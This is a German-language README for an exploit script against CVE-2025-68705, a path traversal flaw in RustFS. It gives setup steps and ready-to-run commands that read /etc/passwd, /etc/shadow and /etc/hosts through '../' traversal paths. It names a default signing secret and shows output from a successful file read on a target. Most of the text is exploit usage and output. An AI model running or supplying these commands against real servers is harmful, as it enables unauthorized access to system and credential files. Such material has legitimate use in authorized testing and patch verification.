
CVE-2025-68705 RustFS Path Traversal Vulnerability Check
Dieses Skript nutzt eine Pfadumgehungsschwachstelle (CVE-2025-68705) in RustFS aus, die das Lesen beliebiger Dateien auf dem Server ermöglicht.
requirements.txt für Abhängigkeitengit clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
| Argument | Beschreibung |
|---|---|
-H, --host | IP-Adresse oder Hostname des Zielsystems |
-p, --port | Zielportnummer |
-f, --file | Dateipfad zum Lesen (optional mit --check-only) |
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
python exp.py -H 192.168.1.128 -p 9000 --check-only
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!
[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
| Argument | Beschreibung | Standard |
|---|
-s, --secret | Geheimer Schlüssel für die Signatur | rustfsadmin |
-o, --offset | Offset beim Lesen der Datei | 0 |
-l, --length | Anzahl der zu lesenden Bytes | 4096 |
--check-only | Nur prüfen, ob das Ziel verwundbar ist | - |